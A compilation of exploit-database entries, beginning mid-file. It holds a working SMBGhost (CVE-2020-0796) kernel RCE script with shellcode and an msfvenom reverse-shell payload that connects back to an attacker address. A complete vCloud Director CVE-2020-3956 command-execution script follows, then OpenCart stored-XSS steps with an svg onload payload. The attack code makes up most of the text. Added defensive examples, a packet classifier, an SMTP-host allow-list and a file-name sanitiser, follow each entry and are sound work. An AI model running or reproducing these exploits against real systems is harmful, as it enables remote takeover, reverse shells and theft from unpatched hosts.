b"\x00\x00\xB9\x1D\x00\x00\x00\xF3\xA4\x48\x8D\x35\x6E\x01\x00\x00" KERNEL_SHELLCODE += b"\xB9\x58\x02\x00\x00\xF3\xA4\x48\x8D\x0D\xD8\x00\x00\x00\x65\x48" KERNEL_SHELLCODE += b"\x8B\x14\x25\x88\x01\x00\x00\x4D\x31\xC0\x4C\x8D\x0D\x46\x00\x00" KERNEL_SHELLCODE += b"\x00\x41\x50\x6A\x01\x48\x8B\x05\x22\x01\x00\x00\x50\x41\x50\x48" KERNEL_SHELLCODE += b"\x83\xEC\x20\xBF\xC4\x5C\x19\x6D\xE8\xBD\xFE\xFF\xFF\x48\x83\xC4" KERNEL_SHELLCODE += b"\x40\x48\x8D\x0D\x9E\x00\x00\x00\x4C\x89\xF2\x4D\x31\xC9\xBF\x34" KERNEL_SHELLCODE += b"\x46\xCC\xAF\x48\x83\xEC\x20\xE8\x9E\xFE\xFF\xFF\x48\x83\xC4\x20" KERNEL_SHELLCODE += b"\x5E\x5F\x41\x5E\x41\x5F\xC3\x90\xC3\x48\x92\x31\xC9\x51\x51\x49" KERNEL_SHELLCODE += b"\x89\xC9\x4C\x8D\x05\x0D\x00\x00\x00\x89\xCA\x48\x83\xEC\x20\xFF" KERNEL_SHELLCODE += b"\xD0\x48\x83\xC4\x30\xC3\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x00\x00" KERNEL_SHELLCODE += b"\x00\x00\x00\x00\x00\x00" # Reverse shell generated by 
msfvenom. Can you believe I had to download Kali Linux for this shit? USER_PAYLOAD = b"" USER_PAYLOAD += b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41" USER_PAYLOAD += b"\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48" USER_PAYLOAD += b"\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f" USER_PAYLOAD += b"\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c" USER_PAYLOAD += b"\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52" USER_PAYLOAD += b"\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b" USER_PAYLOAD += b"\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0" USER_PAYLOAD += b"\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56" USER_PAYLOAD += b"\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9" USER_PAYLOAD += b"\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0" USER_PAYLOAD += b"\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58" USER_PAYLOAD += b"\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44" USER_PAYLOAD += b"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0" USER_PAYLOAD += b"\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a" USER_PAYLOAD += b"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" USER_PAYLOAD += b"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x49\xbe\x77\x73\x32" USER_PAYLOAD += b"\x5f\x33\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec" USER_PAYLOAD += b"\xa0\x01\x00\x00\x49\x89\xe5\x49\xbc\x02\x00\x7a\x69" USER_PAYLOAD += b"\xc0\xa8\x8e\x01\x41\x54\x49\x89\xe4\x4c\x89\xf1\x41" USER_PAYLOAD += b"\xba\x4c\x77\x26\x07\xff\xd5\x4c\x89\xea\x68\x01\x01" USER_PAYLOAD += b"\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff\xd5\x50\x50" USER_PAYLOAD += b"\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89\xc2\x48" USER_PAYLOAD += b"\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5" USER_PAYLOAD += b"\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9" USER_PAYLOAD += b"\x41\xba\x99\xa5\x74\x61\xff\xd5\x48\x81\xc4\x40\x02" USER_PAYLOAD += b"\x00\x00\x49\xb8\x63\x6d\x64\x00\x00\x00\x00\x00\x41" USER_PAYLOAD += 
b"\x50\x41\x50\x48\x89\xe2\x57\x57\x57\x4d\x31\xc0\x6a" USER_PAYLOAD += b"\x0d\x59\x41\x50\xe2\xfc\x66\xc7\x44\x24\x54\x01\x01" USER_PAYLOAD += b"\x48\x8d\x44\x24\x18\xc6\x00\x68\x48\x89\xe6\x56\x50" USER_PAYLOAD += b"\x41\x50\x41\x50\x41\x50\x49\xff\xc0\x41\x50\x49\xff" USER_PAYLOAD += b"\xc8\x4d\x89\xc1\x4c\x89\xc1\x41\xba\x79\xcc\x3f\x86" USER_PAYLOAD += b"\xff\xd5\x48\x31\xd2\x48\xff\xca\x8b\x0e\x41\xba\x08" USER_PAYLOAD += b"\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6" USER_PAYLOAD += b"\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a" USER_PAYLOAD += b"\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59" USER_PAYLOAD += b"\x41\x89\xda\xff\xd5" PML4_SELFREF = 0 PHAL_HEAP = 0 PHALP_INTERRUPT = 0 PHALP_APIC_INTERRUPT = 0 PNT_ENTRY = 0 max_read_retry = 3 overflow_val = 0x1100 write_unit = 0xd0 pmdl_va = KUSER_SHARED_DATA + 0x900 pmdl_mapva = KUSER_SHARED_DATA + 0x800 pshellcodeva = KUSER_SHARED_DATA + 0xa00 class MDL: def __init__(self, map_va, phys_addr): self.next = struct.pack("<Q", 0x0) self.size = struct.pack("<H", 0x40) self.mdl_flags = struct.pack("<H", 0x5004) self.alloc_processor = struct.pack("<H", 0x0) self.reserved = struct.pack("<H", 0x0) self.process = struct.pack("<Q", 0x0) self.map_va = struct.pack("<Q", map_va) map_va &= ~0xFFF self.start_va = struct.pack("<Q", map_va) self.byte_count = struct.pack("<L", 0x1100) self.byte_offset = struct.pack("<L", (phys_addr & 0xFFF) + 0x4) phys_addr_enc = (phys_addr & 0xFFFFFFFFFFFFF000) >> 12 self.phys_addr1 = struct.pack("<Q", phys_addr_enc) self.phys_addr2 = struct.pack("<Q", phys_addr_enc) self.phys_addr3 = struct.pack("<Q", phys_addr_enc) def raw_bytes(self): mdl_bytes = self.next + self.size + self.mdl_flags + \ self.alloc_processor + self.reserved + self.process + \ self.map_va + self.start_va + self.byte_count + \ self.byte_offset + self.phys_addr1 + self.phys_addr2 + \ self.phys_addr3 return mdl_bytes def reconnect(ip, port): sock = socket.socket(socket.AF_INET) sock.settimeout(7) 
sock.connect((ip, port)) return sock def write_primitive(ip, port, data, addr): sock = reconnect(ip, port) smb_negotiate(sock) sock.recv(1000) uncompressed_data = b"\x41"*(overflow_val - len(data)) uncompressed_data += b"\x00"*PNET_RAW_BUFF_OFFSET uncompressed_data += struct.pack('<Q', addr) compressed_data = compress(uncompressed_data) smb_compress(sock, compressed_data, 0xFFFFFFFF, data) sock.close() def write_srvnet_buffer_hdr(ip, port, data, offset): sock = reconnect(ip, port) smb_negotiate(sock) sock.recv(1000) compressed_data = compress_evil(data) dummy_data = b"\x33"*(overflow_val + offset) smb_compress(sock, compressed_data, 0xFFFFEFFF, dummy_data) sock.close() def read_physmem_primitive(ip, port, phys_addr): i = 0 while i < max_read_retry: i += 1 buff = try_read_physmem_primitive(ip, port, phys_addr) if buff is not None: return buff def try_read_physmem_primitive(ip, port, phys_addr): fake_mdl = MDL(pmdl_mapva, phys_addr).raw_bytes() write_primitive(ip, port, fake_mdl, pmdl_va) write_srvnet_buffer_hdr(ip, port, struct.pack('<Q', pmdl_va), PMDL1_OFFSET) i = 0 while i < max_read_retry: i += 1 sock = reconnect(ip, port) smb_negotiate(sock) buff = sock.recv(1000) sock.close() if buff[4:8] != b"\xfeSMB": return buff def get_phys_addr(ip, port, va_addr): pml4_index = (((1 << 9) - 1) & (va_addr >> (40 - 1))) pdpt_index = (((1 << 9) - 1) & (va_addr >> (31 - 1))) pdt_index = (((1 << 9) - 1) & (va_addr >> (22 - 1))) pt_index = (((1 << 9) - 1) & (va_addr >> (13 - 1))) pml4e = PML4 + pml4_index*0x8 pdpt_buff = read_physmem_primitive(ip, port, pml4e) if pdpt_buff is None: sys.exit("[-] physical read primitive failed") pdpt = struct.unpack("<Q", pdpt_buff[0:8])[0] & 0xFFFFF000 pdpte = pdpt + pdpt_index*0x8 pdt_buff = read_physmem_primitive(ip, port, pdpte) if pdt_buff is None: sys.exit("[-] physical read primitive failed") pdt = struct.unpack("<Q", pdt_buff[0:8])[0] & 0xFFFFF000 pdte = pdt + pdt_index*0x8 pt_buff = read_physmem_primitive(ip, port, pdte) if pt_buff is 
None: sys.exit("[-] physical read primitive failed") pt = struct.unpack("<Q", pt_buff[0:8])[0] if pt & (1 << (8 - 1)): phys_addr = (pt & 0xFFFFF000) + (pt_index & 0xFFF)*0x1000 + (va_addr & 0xFFF) return phys_addr else: pt = pt & 0xFFFFF000 pte = pt + pt_index*0x8 pte_buff = read_physmem_primitive(ip, port, pte) if pte_buff is None: sys.exit("[-] physical read primitive failed") phys_addr = (struct.unpack("<Q", pte_buff[0:8])[0] & 0xFFFFF000) + \ (va_addr & 0xFFF) return phys_addr def get_pte_va(addr): pt = addr >> 9 lb = (0xFFFF << 48) | (PML4_SELFREF << 39) ub = ((0xFFFF << 48) | (PML4_SELFREF << 39) + 0x8000000000 - 1) & 0xFFFFFFFFFFFFFFF8 pt = pt | lb pt = pt & ub return pt def overwrite_pte(ip, port, addr): phys_addr = get_phys_addr(ip, port, addr) buff = read_physmem_primitive(ip, port, phys_addr) if buff is None: sys.exit("[-] read primitive failed!") pte_val = struct.unpack("<Q", buff[0:8])[0] # Clear NX bit overwrite_val = pte_val & (((1 << 63) - 1)) overwrite_buff = struct.pack("<Q", overwrite_val) write_primitive(ip, port, overwrite_buff, addr) def build_shellcode(): global KERNEL_SHELLCODE KERNEL_SHELLCODE += struct.pack("<Q", PHALP_INTERRUPT + HALP_APIC_REQ_INTERRUPT_OFFSET) KERNEL_SHELLCODE += struct.pack("<Q", PHALP_APIC_INTERRUPT) KERNEL_SHELLCODE += struct.pack("<Q", PNT_ENTRY & 0xFFFFFFFFFFFFF000) KERNEL_SHELLCODE += USER_PAYLOAD def search_hal_heap(ip, port): global PHALP_INTERRUPT global PHALP_APIC_INTERRUPT search_len = 0x10000 index = PHAL_HEAP page_index = PHAL_HEAP cons = 0 phys_addr = 0 while index < PHAL_HEAP + search_len: # It seems that pages in the HAL heap are not necessarily contiguous in physical memory, # so we try to reduce number of reads like this if not (index & 0xFFF): phys_addr = get_phys_addr(ip, port, index) else: phys_addr = (phys_addr & 0xFFFFFFFFFFFFF000) + (index & 0xFFF) buff = read_physmem_primitive(ip, port, phys_addr) if buff is None: sys.exit("[-] physical read primitive failed!") entry_indices = 8*(((len(buff) + 8 
// 2) // 8) - 1) i = 0 # This heuristic seems to be OK to find HalpInterruptController, but could use improvement while i < entry_indices: entry = struct.unpack("<Q", buff[i:i+8])[0] i += 8 if (entry & 0xFFFFFF0000000000) != 0xFFFFF80000000000: cons = 0 continue cons += 1 if cons > 3: PHALP_INTERRUPT = index + i - 0x40 print("[+] found HalpInterruptController at %lx" % PHALP_INTERRUPT) if len(buff) < i + 0x40: buff = read_physmem_primitive(ip, port, index + i + 0x38) PHALP_APIC_INTERRUPT = struct.unpack("<Q", buff[0:8])[0] if buff is None: sys.exit("[-] physical read primitive failed!") else: PHALP_APIC_INTERRUPT = struct.unpack("<Q",buff[i + 0x38:i+0x40])[0] print("[+] found HalpApicRequestInterrupt at %lx" % PHALP_APIC_INTERRUPT) return index += entry_indices sys.exit("[-] failed to find HalpInterruptController!") def search_selfref(ip, port): search_len = 0x1000 index = PML4 while search_len: buff = read_physmem_primitive(ip, port, index) if buff is None: return entry_indices = 8*(((len(buff) + 8 // 2) // 8) - 1) i = 0 while i < entry_indices: entry = struct.unpack("<Q",buff[i:i+8])[0] & 0xFFFFF000 if entry == PML4: return index + i i += 8 search_len -= entry_indices index += entry_indices def find_pml4_selfref(ip, port): global PML4_SELFREF self_ref = search_selfref(ip, port) if self_ref is None: sys.exit("[-] failed to find PML4 self reference entry!") PML4_SELFREF = (self_ref & 0xFFF) >> 3 print("[+] found PML4 self-ref entry %0x" % PML4_SELFREF) def find_low_stub(ip, port): global PML4 global PHAL_HEAP global PNT_ENTRY limit = 0x100000 index = 0x1000 while index < limit: buff = read_physmem_primitive(ip, port, index) if buff is None: sys.exit("[-] physical read primitive failed!") entry = struct.unpack("<Q", buff[0:8])[0] & 0xFFFFFFFFFFFF00FF if entry == LOWSTUB_JMP: print("[+] found low stub at phys addr %lx!" 
% index) PML4 = struct.unpack("<Q", buff[PML4_LOWSTUB_OFFSET: PML4_LOWSTUB_OFFSET + 8])[0] print("[+] PML4 at %lx" % PML4) PHAL_HEAP = struct.unpack("<Q", buff[SELFVA_LOWSTUB_OFFSET:SELFVA_LOWSTUB_OFFSET + 8])[0] & 0xFFFFFFFFF0000000 print("[+] base of HAL heap at %lx" % PHAL_HEAP) buff = read_physmem_primitive(ip, port, index + NTENTRY_LOWSTUB_OFFSET) if buff is None: sys.exit("[-] physical read primitive failed!") PNT_ENTRY = struct.unpack("<Q", buff[0:8])[0] print("[+] ntoskrnl entry at %lx" % PNT_ENTRY) return index += 0x1000 sys.exit("[-] Failed to find low stub in physical memory!") def do_rce(ip, port): find_low_stub(ip, port) find_pml4_selfref(ip, port) search_hal_heap(ip, port) build_shellcode() print("[+] built shellcode!") pKernelUserSharedPTE = get_pte_va(KUSER_SHARED_DATA) print("[+] KUSER_SHARED_DATA PTE at %lx" % pKernelUserSharedPTE) overwrite_pte(ip, port, pKernelUserSharedPTE) print("[+] KUSER_SHARED_DATA PTE NX bit cleared!") # TODO: figure out why we can't write the entire shellcode data at once. There is a check before srv2!Srv2DecompressData preventing the call of the function. to_write = len(KERNEL_SHELLCODE) write_bytes = 0 while write_bytes < to_write: write_sz = min([write_unit, to_write - write_bytes]) write_primitive(ip, port, KERNEL_SHELLCODE[write_bytes:write_bytes + write_sz], pshellcodeva + write_bytes) write_bytes += write_sz print("[+] Wrote shellcode at %lx!" % pshellcodeva) input("[+] Press a key to execute shellcode!") write_primitive(ip, port, struct.pack("<Q", pshellcodeva), PHALP_INTERRUPT + HALP_APIC_REQ_INTERRUPT_OFFSET) print("[+] overwrote HalpInterruptController pointer, should have execution shortly...") if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument("-ip", help="IP address of target", required=True) parser.add_argument("-p", "--port", default=445, help="SMB port, \ default: 445", required=False, type=int) args = parser.parse_args() do_rce(args.ip, args.port)
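Added detection example, not part of the PoC or the zip it ships with: a parser for the SMB2 COMPRESSION_TRANSFORM_HEADER (MS-SMB2 section 2.2.42: ProtocolId 0xFC 'S' 'M' 'B', then OriginalCompressedSegmentSize, CompressionAlgorithm, Flags and Offset/Length) and a classifier that flags the condition CVE-2020-0796 abuses. The PoC above passes 0xFFFFFFFF and 0xFFFFEFFF as OriginalCompressedSegmentSize so that the 32-bit sum with Offset wraps before srv2 allocates the destination buffer; a sensor or packet-capture triage script can check the same sum. The sample packets are constructed, the NetBIOS-prefix handling mirrors the `buff[4:8]` check in the PoC, and the 8 MiB threshold (Windows' default SMB2 MaxTransactSize) is our heuristic.

```python
import struct

# ProtocolId values from MS-SMB2: 0xFE 'S' 'M' 'B' for a plain SMB2 header and
# 0xFC 'S' 'M' 'B' for the COMPRESSION_TRANSFORM_HEADER (section 2.2.42).
SMB2_HEADER_ID = b"\xfeSMB"
SMB2_COMPRESSION_ID = b"\xfcSMB"
ALGORITHMS = {0: "NONE", 1: "LZNT1", 2: "LZ77", 3: "LZ77+Huffman", 4: "Pattern_V1"}
# Heuristic threshold (our assumption): Windows' default SMB2 MaxTransactSize.
# No legitimate client asks the server to decompress more than one transaction.
MAX_REASONABLE_SEGMENT = 8 * 1024 * 1024


def strip_netbios(data):
    """Drop the 4-byte NetBIOS session-service header when present."""
    if len(data) >= 8 and data[4:8] in (SMB2_HEADER_ID, SMB2_COMPRESSION_ID):
        return data[4:]
    return data


def parse_compression_transform_header(packet):
    """Return the header fields as a dict, or None if this is not a compression transform."""
    data = strip_netbios(packet)
    if len(data) < 16 or data[:4] != SMB2_COMPRESSION_ID:
        return None
    original_size, algorithm, flags, offset = struct.unpack_from("<IHHI", data, 4)
    return {
        "original_size": original_size,   # OriginalCompressedSegmentSize
        "algorithm": ALGORITHMS.get(algorithm, "unknown(%d)" % algorithm),
        "flags": flags,
        "offset": offset,                 # Offset/Length: length of the uncompressed prefix
        "payload_len": len(data) - 16,    # bytes following the 16-byte header
    }


def suspicious_reasons(header):
    """srv2 added OriginalCompressedSegmentSize and Offset as 32-bit values with no
    overflow check and allocated the wrapped (tiny) result; the fix added that check.
    Flag exactly that condition, plus segment sizes no client would legitimately request."""
    if header is None:
        return []
    reasons = []
    if header["original_size"] + header["offset"] > 0xFFFFFFFF:
        reasons.append("OriginalCompressedSegmentSize + Offset wraps 32 bits")
    if header["original_size"] > MAX_REASONABLE_SEGMENT:
        reasons.append("OriginalCompressedSegmentSize exceeds default MaxTransactSize")
    if header["offset"] > header["payload_len"]:
        reasons.append("Offset points past the end of the message")
    return reasons


def _netbios(payload):
    """NetBIOS session-service framing: big-endian length, then the SMB2 message."""
    return struct.pack(">I", len(payload)) + payload


# Constructed samples: a benign LZNT1 transform, a transform shaped like the PoC's
# smb_compress(..., 0xFFFFFFFF, data) call, and an uncompressed SMB2 message.
BENIGN_PACKET = _netbios(SMB2_COMPRESSION_ID + struct.pack("<IHHI", 0x1000, 1, 0, 0) + b"\x00" * 64)
HOSTILE_PACKET = _netbios(SMB2_COMPRESSION_ID + struct.pack("<IHHI", 0xFFFFFFFF, 1, 0, 0x10) + b"\x00" * 64)
PLAIN_SMB2_PACKET = _netbios(SMB2_HEADER_ID + b"\x00" * 60)
```

Fed a pcap's TCP/445 payloads one message at a time, `suspicious_reasons(parse_compression_transform_header(msg))` is empty for ordinary compressed traffic and non-empty for the PoC's writes. On the host side the same traffic can be prevented outright by turning off SMBv3 compression on the server until it is patched.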
-
vCloud Director 9.7.0.15498291 - Remote Code Execution
#!/usr/bin/python
# Exploit Title: vCloud Director - Remote Code Execution
# Exploit Author: Tomas Melicher
# Technical Details: https://citadelo.com/en/blog/full-infrastructure-takeover-of-vmware-cloud-director-CVE-2020-3956/
# Date: 2020-05-24
# Vendor Homepage: https://www.vmware.com/
# Software Link: https://www.vmware.com/products/cloud-director.html
# Tested On: vCloud Director 9.7.0.15498291
# Vulnerability Description:
# VMware vCloud Director suffers from an Expression Injection vulnerability that allows remote attackers to gain Remote Code Execution (RCE) by submitting a malicious value as the SMTP host name.

import argparse # pip install argparse
import base64, os, re, requests, sys
if sys.version_info >= (3, 0):
    from urllib.parse import urlparse
else:
    from urlparse import urlparse

from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

PAYLOAD_TEMPLATE = "${''.getClass().forName('java.io.BufferedReader').getDeclaredConstructors()[1].newInstance(''.getClass().forName('java.io.InputStreamReader').getDeclaredConstructors()[3].newInstance(''.getClass().forName('java.lang.ProcessBuilder').getDeclaredConstructors()[0].newInstance(['bash','-c','echo COMMAND|base64 -di|bash|base64 -w 0']).start().getInputStream())).readLine()}"

session = requests.Session()

def login(url, username, password, verbose):
    target_url = '%s://%s%s'%(url.scheme, url.netloc, url.path)
    res = session.get(target_url)
    match = re.search(r'tenant:([^"]+)', res.content, re.IGNORECASE)
    if match:
        tenant = match.group(1)
    else:
        print('[!] can\'t find tenant identifier')
        return (None,None,None,None)
    if verbose:
        print('[*] tenant: %s'%(tenant))

    match = re.search(r'security_check\?[^"]+', res.content, re.IGNORECASE)
    if match: # Cloud Director 9.*
        login_url = '%s://%s/login/%s'%(url.scheme, url.netloc, match.group(0))
        res = session.post(login_url, data={'username':username,'password':password})
        if res.status_code == 401:
            print('[!] invalid credentials')
            return (None,None,None,None)
    else: # Cloud Director 10.*
        match = re.search(r'/cloudapi/.*/sessions', res.content, re.IGNORECASE)
        if match:
            login_url = '%s://%s%s'%(url.scheme, url.netloc, match.group(0))
            headers = {
                'Authorization': 'Basic %s'%(base64.b64encode('%s@%s:%s'%(username,tenant,password))),
                'Accept': 'application/json;version=29.0',
                'Content-type': 'application/json;version=29.0'
            }
            res = session.post(login_url, headers=headers)
            if res.status_code == 401:
                print('[!] invalid credentials')
                return (None,None,None,None)
        else:
            print('[!] url for login form was not found')
            return (None,None,None,None)

    cookies = session.cookies.get_dict()
    jwt = cookies['vcloud_jwt']
    session_id = cookies['vcloud_session_id']
    if verbose:
        print('[*] jwt token: %s'%(jwt))
        print('[*] session_id: %s'%(session_id))

    res = session.get(target_url)
    match = re.search(r'organization : \'([^\']+)', res.content, re.IGNORECASE)
    if match is None:
        print('[!] organization not found')
        return (None,None,None,None)
    organization = match.group(1)
    if verbose:
        print('[*] organization name: %s'%(organization))
    match = re.search(r'orgId : \'([^\']+)', res.content)
    if match is None:
        print('[!] orgId not found')
        return (None,None,None,None)
    org_id = match.group(1)
    if verbose:
        print('[*] organization identifier: %s'%(org_id))

    return (jwt,session_id,organization,org_id)

def exploit(url, username, password, command, verbose):
    (jwt,session_id,organization,org_id) = login(url, username, password, verbose)
    if jwt is None:
        return
    headers = {
        'Accept': 'application/*+xml;version=29.0',
        'Authorization': 'Bearer %s'%jwt,
        'x-vcloud-authorization': session_id
    }
    admin_url = '%s://%s/api/admin/'%(url.scheme, url.netloc)
    res = session.get(admin_url, headers=headers)
    match = re.search(r'<description>\s*([^<\s]+)', res.content, re.IGNORECASE)
    if match:
        version = match.group(1)
        if verbose:
            print('[*] detected version of Cloud Director: %s'%(version))
    else:
        version = None
        print('[!] can\'t find version of Cloud Director, assuming it is more than 10.0')

    email_settings_url = '%s://%s/api/admin/org/%s/settings/email'%(url.scheme, url.netloc, org_id)
    payload = PAYLOAD_TEMPLATE.replace('COMMAND', base64.b64encode('(%s) 2>&1'%command))
    data = '<root:OrgEmailSettings xmlns:root="http://www.vmware.com/vcloud/v1.5"><root:IsDefaultSmtpServer>false</root:IsDefaultSmtpServer>'
    data += '<root:IsDefaultOrgEmail>true</root:IsDefaultOrgEmail><root:FromEmailAddress/><root:DefaultSubjectPrefix/>'
    data += '<root:IsAlertEmailToAllAdmins>true</root:IsAlertEmailToAllAdmins><root:AlertEmailTo/><root:SmtpServerSettings>'
    data += '<root:IsUseAuthentication>false</root:IsUseAuthentication><root:Host>%s</root:Host><root:Port>25</root:Port>'%(payload)
    data += '<root:Username/><root:Password/></root:SmtpServerSettings></root:OrgEmailSettings>'
    res = session.put(email_settings_url, data=data, headers=headers)
    match = re.search(r'value:\s*\[([^\]]+)\]', res.content)
    if verbose:
        print('')
    try:
        print(base64.b64decode(match.group(1)))
    except Exception:
        print(res.content)

parser = argparse.ArgumentParser(usage='%(prog)s -t target -u username -p password [-c command] [--check]')
parser.add_argument('-v', action='store_true')
parser.add_argument('-t', metavar='target', help='url to html5 client (http://example.com/tenant/my_company)', required=True)
parser.add_argument('-u', metavar='username', required=True)
parser.add_argument('-p', metavar='password', required=True)
parser.add_argument('-c', metavar='command', help='command to execute', default='id')
args = parser.parse_args()
url = urlparse(args.t)
exploit(url, args.u, args.p, args.c, args.v)
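Added example, neither the exploit's nor VMware's code: allow-list validation for the SMTP host setting (an IP literal or an RFC 1123 hostname, nothing else) and a request-body scan for expression-language markers that a WAF rule or log triage can apply to the `OrgEmailSettings` PUT shown above. The validator is defence in depth; the root fix is to stop passing a stored setting through an expression evaluator. The sample body is constructed and carries a shortened form of the page's `${''.getClass()...}` value.

```python
import ipaddress
import re

# RFC 1123 host label: letters, digits and hyphens, 1-63 chars, no leading or trailing hyphen.
_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")
# Expression-language openers. The advisory's payload starts with "${".
_EL_MARKER = re.compile(r"[$#]\{")


def is_valid_smtp_host(value):
    """Allow-list check for the SMTP host field: an IP address or a hostname of at
    most 253 characters. Anything else, including "${...}" expressions, is rejected
    before the value is stored, so it can never reach a template engine."""
    value = value.strip()
    if not value or len(value) > 253:
        return False
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        pass
    labels = value.rstrip(".").split(".")
    return all(_LABEL.match(label) for label in labels)


def find_expression_markers(body):
    """Detection-side helper: return (offset, snippet) for every "${" or "#{" in a
    request body, so a proxy or log pipeline can flag settings writes that carry them."""
    return [(m.start(), body[m.start():m.start() + 40]) for m in _EL_MARKER.finditer(body)]


def validate_email_settings_xml(body):
    """Pull the <root:Host> value out of an OrgEmailSettings body (same element the
    exploit targets) and apply the allow-list to it. Returns (host, is_valid)."""
    m = re.search(r"<root:Host>(.*?)</root:Host>", body, re.DOTALL)
    if m is None:
        return (None, False)
    host = m.group(1)
    return (host, is_valid_smtp_host(host))


# Constructed sample body shaped like the PUT on the page, with the payload shortened.
SAMPLE_BODY = (
    '<root:SmtpServerSettings><root:IsUseAuthentication>false</root:IsUseAuthentication>'
    "<root:Host>${''.getClass().forName('x')}</root:Host><root:Port>25</root:Port>"
    '</root:SmtpServerSettings>'
)
BENIGN_BODY = SAMPLE_BODY.replace("${''.getClass().forName('x')}", "smtp.example.com")
```

A tenant administrator's input is still attacker-controlled from the provider's point of view, which is why the check belongs on the server side of the API, not only in the HTML5 client.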
-
OpenCart 3.0.3.2 - Stored Cross Site Scripting (Authenticated)
# Exploit Title: OpenCart 3.0.3.2 - Stored Cross Site Scripting (Authenticated)
# Date: 2020-06-01
# Exploit Author: Kailash Bohara
# Vendor Homepage: https://www.opencart.com
# Software Link: https://www.opencart.com/index.php?route=cms/download
# Version: OpenCart < 3.0.3.2
# CVE : CVE-2020-10596

1. Go to localhost.com/opencart/admin and log in with valid credentials.
2. Navigate to System > Users > Users and click the Action button in the top right corner.
3. In the Image field, click the image to upload a new one. Before uploading, rename any image file to the XSS payload "><svg onload=alert("XSS")> and upload it as the new user profile image.
4. After the upload completes the XSS pop-up fires as shown below, and it fires again each time someone visits the Image Manager section.
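Added example, not OpenCart's code: the two places a stored file-name XSS is stopped, an allow-list sanitiser applied when the upload is accepted and attribute escaping applied when the name is rendered. The sample file name is constructed from the advisory's payload plus an image extension; the allowed-extension set and the `/image/catalog/` URL prefix are assumptions.

```python
import html
import os
import re
import unicodedata
import urllib.parse

# Assumed allow-list for a profile-image upload.
ALLOWED_IMAGE_EXT = {".jpg", ".jpeg", ".png", ".gif", ".webp"}
# Constructed sample: the advisory's payload used as a file name.
XSS_FILENAME = '"><svg onload=alert("XSS")>.png'


def safe_upload_name(original):
    """Reduce an uploaded file name to [A-Za-z0-9._-]: drop any directory part,
    fold accented characters to ASCII, collapse every other run of characters to
    '_', and reject extensions outside the allow-list."""
    base = os.path.basename(original.replace("\\", "/"))
    stem, ext = os.path.splitext(base)
    ext = ext.lower()
    if ext not in ALLOWED_IMAGE_EXT:
        raise ValueError("disallowed extension: %r" % ext)
    stem = unicodedata.normalize("NFKD", stem).encode("ascii", "ignore").decode("ascii")
    stem = re.sub(r"[^A-Za-z0-9._-]+", "_", stem).strip("._") or "upload"
    return stem[:100] + ext


def is_allowed_upload(original):
    """Boolean wrapper around safe_upload_name() for callers that only need a verdict."""
    try:
        safe_upload_name(original)
        return True
    except ValueError:
        return False


def render_image_tag(stored_name):
    """Output-side fix: URL-encode the name inside the src and HTML-escape it inside
    the alt attribute, so a name containing '"' or '<' cannot close the attribute."""
    src = "/image/catalog/%s" % urllib.parse.quote(stored_name)
    return '<img src="%s" alt="%s">' % (html.escape(src, quote=True),
                                        html.escape(stored_name, quote=True))
```

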